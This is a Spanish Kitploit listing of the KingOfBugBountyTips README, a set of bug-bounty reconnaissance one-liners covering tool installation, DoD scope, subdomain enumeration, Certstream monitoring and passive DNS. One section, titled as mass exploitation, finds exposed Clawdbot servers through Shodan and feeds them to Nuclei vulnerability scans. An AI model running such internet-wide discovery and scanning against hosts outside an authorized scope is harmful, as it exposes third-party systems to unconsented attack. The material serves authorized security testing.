Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
KingOfBugBountyTips — Nuestro objetivo principal es compartir consejos de algunos cazadores de bugs conocidos. Usando metodología de reconocimiento, podemos encontrar subdominios, APIs y tokens que ya son explotables, para poder reportarlos. Queremos influir en Onelinetips y explicar los comandos, para una mejor comprensión de los nuevos cazadores. | Kitploit
Herramientas/GitHubGitHub/kingofbugbounty/kingofbugbountytips
OSINT (Inteligencia de Fuentes Abiertas)ReconocimientoEscáneres de VulnerabilidadesSeguridad WebPruebas de PenetraciónEnumeración de SubdominiosAprendizaje y EducaciónRecursos CuradosTop en Reconocimiento #8

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

GitHubkingofbugbounty/kingofbugbountytips

KingOfBugBountyTips

Ver Repositorio
5.5k984hace 1 mesRevisado por Kitploit

Nuestro objetivo principal es compartir consejos de algunos cazadores de bugs conocidos. Usando metodología de reconocimiento, podemos encontrar subdominios, APIs y tokens que ya son explotables, para poder reportarlos. Queremos influir en Onelinetips y explicar los comandos, para una mejor comprensión de los nuevos cazadores.

Compartir

KingOfBugBountyTips

Reconocimiento Táctico

El Arsenal Definitivo de Reconocimiento para Bug Bounty

"En las sombras cazamos, en el código confiamos"


Stars Forks Last Commit License


Telegram | Twitter | YouTube | LinkedIn


DoD VDP Scope

Programa de Divulgación de Vulnerabilidades del DoD | KingRecon DOD

Alcance Completo del DoD - 19 Dominios```bash # BBRF Scope - All DoD Domains bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil' ``` | Ramas Militares | Agencias del DoD | Comandos de Apoyo | |:-----------------|:-------------|:-----------------| | `*.af.mil` - Fuerza Aérea | `*.pentagon.mil` - Sede del Pentágono | `*.dtic.mil` - Centro de Información Técnica | | `*.army.mil` - Ejército | `*.osd.mil` - Oficina del Secretario de Defensa | `*.dau.mil` - Universidad de Adquisiciones | | `*.marines.mil` - Infantería de Marina | `*.disa.mil` - Sistemas de Información de Defensa | `*.health.mil` - Salud Militar | | `*.navy.mil` - Armada | `*.dtra.mil` - Reducción de Amenazas | `*.ng.mil` - Guardia Nacional | | `*.spaceforce.mil` - Fuerza Espacial | `*.dla.mil` - Agencia Logística | `*.uscg.mil` - Guardia Costera | | `*.ussf.mil` - Fuerza Espacial | `*.dcma.mil` - Gestión de Contratos | `*.socom.mil` - Operaciones Especiales |

Aviso de Seguridad

Este repositorio es SOLO para fines EDUCATIVOS y PRUEBAS AUTORIZADAS. Obtenga siempre la autorización adecuada antes de realizar pruebas.

📜 Haga clic para leer nuestra Política de Seguridad y Directrices

✅ Casos de Uso Permitidos

  • ✅ Programas de Bug Bounty Autorizados - HackerOne, Bugcrowd, Intigriti, etc.
  • ✅ Pruebas de Penetración Autorizadas - Con permiso por escrito
  • ✅ Entornos de Laboratorio Personal - Su propia infraestructura
  • ✅ Fines Educativos - Aprendizaje e investigación
  • ✅ Programa VDP del DoD - Siguiendo las reglas del programa

❌ Actividades Prohibidas

  • ❌ Pruebas No Autorizadas - Probar sin permiso explícito
  • ❌ Intención Maliciosa - Usar técnicas para dañar o robar
  • ❌ Pruebas Fuera de Alcance - Probar objetivos fuera del alcance del programa
  • ❌ Ingeniería Social - A menos que esté explícitamente permitida en el programa
  • ❌ Ataques DoS/DDoS - Ataques de agotamiento de recursos

📋 Directrices de Divulgación Responsable

  1. Lea la Política del Programa - Revise siempre el alcance y las reglas
  2. Pruebe de Forma Segura - No cause daños a los sistemas de producción
  3. Documente Todo - Mantenga notas detalladas de sus hallazgos
  4. Reporte de Forma Privada - Use los canales oficiales para la divulgación
  5. Dé Tiempo para Corregir - Permita a los proveedores un tiempo razonable para parchear
  6. Sea Profesional - Mantenga estándares éticos

🔒 Reportar Problemas de Seguridad


📚 Tabla de Contenidos

Haga clic para expandir la navegación

🎯 Acerca De

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ 🎯 MISSION STATEMENT 🎯 ║ ╠═══════════════════════════════════════════════════════════════╣ ║ Share elite bug bounty techniques from world-class hunters ║ ║ Build the most comprehensive one-liner collection ║ ║ Empower the security research community ║ ╚═══════════════════════════════════════════════════════════════╝ ```

Nuestro objetivo principal es compartir consejos de cazadores de bugs reconocidos. Usando metodología avanzada de reconocimiento, descubrimos subdominios, APIs, tokens y vulnerabilidades explotables. Buscamos influir y educar a la comunidad con técnicas poderosas de una línea para una mejor comprensión y resultados más rápidos.

🏆 ¿Qué Hace Especial a Este Repositorio?

📦 Recursos Especiales

BugBuntu KingRecon Contribute

📊 Aspectos Destacados del Repositorio

📈 Haga clic para ver estadísticas detalladas

🚀 Inicio Rápido

⚡ Obtén tu primer reconocimiento funcionando en menos de 5 minutos

1️⃣ Instalar Herramientas

Time
```bash # 📥 Step 1: Install essential tools (ProjectDiscovery Suite) go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

🔍 Step 2: Run your first reconnaissance chain

subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

🎉 Step 3: Analyze results and profit!

Check the output for vulnerabilities and start reporting!

root@kitploit:~
<details>
<summary><b>🎬 ¿Quieres un flujo de trabajo completamente automatizado? ¡Haz clic aquí!</b></summary>

<br>```bash
# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

🎯 Consejos Pro para Principiantes


🛠️ Herramientas Requeridas

Haz clic para expandir la lista completa de herramientas

Herramientas Principales


📊 Analíticas del Repositorio


💖 Apoya el Proyecto

Si este repositorio te ha ayudado en tu viaje de bug bounty, ¡considera apoyar el proyecto!

Buy Me A Coffee

⭐ Muestra tu Apoyo

¡Dale una estrella a este repositorio si te resultó útil!

GitHub stars


📜 Licencia y Legal

License

⚠️ Aviso Importante

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ ⚠️ LEGAL NOTICE ⚠️ ║ ╠═══════════════════════════════════════════════════════════════╣ ║ This repository is for EDUCATIONAL PURPOSES ONLY ║ ║ ║ ║ ✅ DO: Use for authorized security testing ║ ║ ✅ DO: Learn and understand the techniques ║ ║ ✅ DO: Contribute and share knowledge ║ ║ ║ ║ ❌ DON'T: Use for unauthorized testing ║ ║ ❌ DON'T: Use for malicious purposes ║ ║ ❌ DON'T: Violate laws or regulations ║ ║ ║ ║ The authors are NOT responsible for any misuse or damage ║ ║ caused by this information. Always test responsibly! ║ ╚═══════════════════════════════════════════════════════════════╝ ```

🔗 Enlaces rápidos y recursos


🌟 Agradecimientos especiales

A todos los contribuyentes, cazadores de recompensas de bugs y la comunidad de seguridad que hacen posible este proyecto.


Última actualización: julio de 2026 | Versión: 4.6



```ascii ╔══════════════════════════════════════════════════════════════════╗ ║ "Stay curious, stay ethical, stay hungry" 🏴‍☠️ ║ ║ Happy Hunting! 💀 ║ ╚══════════════════════════════════════════════════════════════════╝

root@kitploit:~
<br>

**Hecho con ❤️ por la Comunidad Bug Bounty**

</div>
Descargar herramienta

¿Encontró un problema de seguridad en este repositorio? Por favor, repórtelo de forma responsable:

Report Issue

SecciónDescripción
Acerca deResumen del proyecto y objetivos
Inicio RápidoComience en 5 minutos
Herramientas RequeridasConjunto de herramientas esenciales
Alcance BBRF DoDConfiguración del alcance del DoD
Enumeración de SubdominiosEncontrar subdominios
Reconocimiento en JavaScriptAnálisis de archivos JS
Detección de XSSCross-site scripting
Inyección SQLTécnicas de SQLi
SSRF y SSTIAtaques del lado del servidor
Rastreo WebMétodos de rastreo profundo
Descubrimiento de ParámetrosParámetros ocultos
Descubrimiento de ContenidoArchivos sensibles
Escaneo con NucleiEscaneo automatizado
Pruebas de Seguridad en APIVulnerabilidades de API
Seguridad en la NubeAWS, GCP, Azure
Scripts de AutomatizaciónScripts listos para usar
Funciones BashProductividad en shell
Nuevos Oneliners 2026Exploits y técnicas de CVE-2026
Oneliners 2024-2025Técnicas anteriores
Descubrimiento de CVE Febrero 2026Últimos oneliners de reconocimiento CVE
Motores de BúsquedaMotores de búsqueda para hackers
Listas de PalabrasMejores listas de palabras
RecursosLibros, cursos, blogs
Oneliners
💎 Comandos Curados
Probados en batalla por cazadores reales
Methodology
🎯 Metodología Completa
Desde reconocimiento hasta explotación
Updated
🔄 Constantemente Actualizado
Nuevas técnicas semanalmente
Community
🌍 Impulsado por la Comunidad
Los mejores cazadores del mundo
CategoríaConteoEstado
Comandos de una línea400+✅ Activo
Técnicas50+✅ Activo
Herramientas Cubiertas100+✅ Activo
Ejemplos CVE20+✅ Activo
Dominios DoD19✅ Activo
ContribuidoresEn crecimiento🚀 Creciendo
Última Actualización2026✅ Actual

2️⃣ Ejecutar Reconocimiento

Time

3️⃣ Encontrar Bugs

Time
ConsejoDescripción
🔑Obtén siempre la autorización adecuada antes de realizar pruebas
📝Mantén notas detalladas de tus hallazgos
🛠️Comienza con herramientas automatizadas, luego pruebas manuales
💰Enfócate primero en vulnerabilidades de alto impacto
🤝Únete a la comunidad y aprende de otros
CategoríaHerramientasInstalación
SubdominioSubfinder, Amass, Assetfinder, Findomain, Chaosgo install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
Sondeo HTTPHttpx, Httprobego install github.com/projectdiscovery/httpx/cmd/httpx@latest
RastreoKatana, Gospider, Hakrawler, Cariddigo install github.com/projectdiscovery/katana/cmd/katana@latest
URLsGau, Waybackurls, Waymorego install github.com/lc/gau/v2/cmd/gau@latest
EscaneoNuclei, Jaeles, Naabugo install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSSDalfox, XSStrike, Kxss, Airixssgo install github.com/hahwul/dalfox/v2@latest
SQLiSQLMap, Ghauripip install sqlmap ghauri
UtilidadesAnew, Qsreplace, Unfurl, Gf, Urogo install github.com/tomnomnom/anew@latest
FuzzingFfuf, Feroxbustergo install github.com/ffuf/ffuf/v2@latest
Análisis JSSubjs, LinkFinder, SecretFinder, Jsubfindergo install github.com/lc/subjs@latest
Monitoreo de CertificadosCertstream, Certstream-gopip install certstream
DNSDnsx, Shuffledns, PureDNS, MassDNS, Dnsgengo install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
DNS InversoHakrevdns, Pripsgo install github.com/hakluke/hakrevdns@latest
Descubrimiento de APIArjun, x8, ParamSpiderpip install arjun
Capturas de pantallaGowitness, Eyewitnessgo install github.com/sensepost/gowitness@latest
NubeAWS CLI, CloudEnum, S3Scannerpip install awscli
OSINTShodan CLI, Censys, Metabigorpip install shodan censys
Reconocimiento GitTrufflehog, Gitrob, Github-Subdomainsgo install github.com/trufflesecurity/trufflehog/v3@latest
Gestión de ÁmbitoBBRFpip install bbrf

Dependencias del Sistema```bash

Ubuntu/Debian

sudo apt update && sudo apt install -y
jq
curl
wget
git
python3
python3-pip
golang-go
nmap
masscan
chromium-browser
parallel
whois
dnsutils
libpcap-dev
build-essential

macOS

brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

root@kitploit:~
### Configuración del entorno Go```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Script de instalación rápida - Herramientas Go```bash

#!/bin/bash

One-click install for all Go tools

echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" )

for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done

echo "[✓] Go tools installed!"

root@kitploit:~
### Script de Instalación Rápida - Herramientas de Python```bash
#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Script de instalación rápida - Herramientas Rust (Feroxbuster)```bash

#!/bin/bash

Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

Install Rust if not present

if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi

Install Feroxbuster

cargo install feroxbuster

echo "[✓] Rust tools installed!"

root@kitploit:~
### Script de instalación rápida - Herramientas externas```bash
#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Script de Instalación Maestro (All-in-One)```bash

#!/bin/bash

MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗" echo "║ KingOfBugBounty - Complete Tool Installation ║" echo "╚══════════════════════════════════════════════════════════╝"

System dependencies (run with sudo)

echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

Go environment

echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc

Go tools

echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master

Python tools

echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

Rust tools

echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster

Update Nuclei templates

nuclei -update-templates

echo "" echo "╔══════════════════════════════════════════════════════════╗" echo "║ ✓ Installation Complete! ║" echo "╚══════════════════════════════════════════════════════════╝" echo "" echo "Run 'source ~/.bashrc' to reload your environment"

root@kitploit:~
### Instalación de listas de palabras```bash
#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Verificar la instalación```bash

#!/bin/bash

Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[✓] $tool" else echo "[✗] $tool - NOT FOUND" fi done

root@kitploit:~
</details>

---

## 🎯 BBRF Alcance DoD```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Enumeración de Subdominios ☠️

``` ███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ██╗███╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗ ██║ ███████╗██║ ██║██████╔╝██║ ██║██║ ██║██╔████╔██║███████║██║██╔██╗ ██║ ╚════██║██║ ██║██╔══██╗██║ ██║██║ ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║ ███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║ ██║██║██║ ╚████║ ╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ``` **☠️ ENUMERAR TODO ☠️**

💀 Descubrimiento Multi-Fuente (Todo-en-Uno)```bash

☠️ Ultimate subdomain enumeration - All tools combined

subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt

root@kitploit:~
### 💀 Registros de Transparencia de Certificados```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Monitoreo en Tiempo Real - Básico```bash

☠️ Monitor certificates in real-time for specific keyword

pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

root@kitploit:~
### 💀 Certstream con Filtro de Dominio```bash
# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream para Descubrimiento de Subdominios```bash

☠️ Extract all SANs (Subject Alternative Names) in real-time

certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target.com$" | sort -u | anew certstream_subs.txt

root@kitploit:~
### 💀 Certstream + httpx Pipeline en vivo```bash
# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Detección de Phishing de Certstream```bash

☠️ Monitor for potential phishing domains (brand impersonation)

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE ".(paypal|apple|google|microsoft|amazon|facebook|netflix).com$" | anew phishing_certs.txt

root@kitploit:~
### 💀 Certstream con escaneo automático de Nuclei```bash
# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Script de recolección masiva de Certstream```bash

☠️ Collect all certificates for specific TLDs

timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E ".(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

root@kitploit:~
### 💀 Cazador de Certificados Comodín de Certstream```bash
# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Enriquecimiento de Certstream + Shodan```bash

☠️ Real-time certs -> resolve IP -> Shodan lookup

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

root@kitploit:~
### 💀 Certstream JSON Logger con Marca de Tiempo```bash
# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Monitor de alcance de Bug Bounty```bash

☠️ Monitor multiple bug bounty targets simultaneously

TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

root@kitploit:~
### 💀 Pipeline de Shodan + Nuclei```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 Descubrimiento de Clawdbot a través de Shodan (Explotación Masiva)

⚡ 1. Buscar instancias de Clawdbot - Búsqueda básica```bash

💀 Locate Clawdbot servers exposed on the internet

shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt

root@kitploit:~
#### ⚡ 2. Clawdbot Descubrimiento de Cabeceras HTTP```bash
# 💀 Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"

⚡ 3. Detección de User-Agent de Clawdbot```bash

💀 Detect Clawdbot via User-Agent strings

shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt

root@kitploit:~
#### ⚡ 4. Clawdbot + Nuclei Pipeline de Explotación```bash
# 💀 Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt

⚡ 5. Huella del servidor Clawdbot```bash

💀 Extract detailed server info from Clawdbot hosts

shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt

root@kitploit:~
#### ⚡ 6. Análisis de Distribución ASN de Clawdbot```bash
# 💀 Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt

⚡ Distribución geográfica de Clawdbot```bash

💀 Find Clawdbot by country for geo-targeted testing

for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done

root@kitploit:~
#### ⚡ 8. Clawdbot + Escaneo de Rango de Puertos```bash
# 💀 Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt

⚡ 9. Análisis del Certificado SSL de Clawdbot```bash

💀 Extract Clawdbot hosts with SSL certificate info

shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt

root@kitploit:~
#### ⚡ 10. Clawdbot Realtime Monitor + Alert```bash
# 💀 Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &

💀 Descubrimiento de ASN y Reverse DNS```bash

☠️ Find all IPs from organization ASN

echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]+.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

root@kitploit:~
### 💀 DNS Bruteforce con Shuffledns```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Enumeración Recursiva de Subdominios```bash

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

root@kitploit:~
### 💀 DNS Pasivo - Múltiples Fuentes```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9](https://github.com/kingofbugbounty/kingofbugbountytips/blob/HEAD/%5Ba-zA-Z0-9-%5D*%5Ba-zA-Z0-9%5D)?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 Scraping de subdominios de GitHub```bash

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

root@kitploit:~
### 💀 Descubrimiento de Subdominios de Censys```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API```bash

☠️ SecurityTrails subdomain enumeration

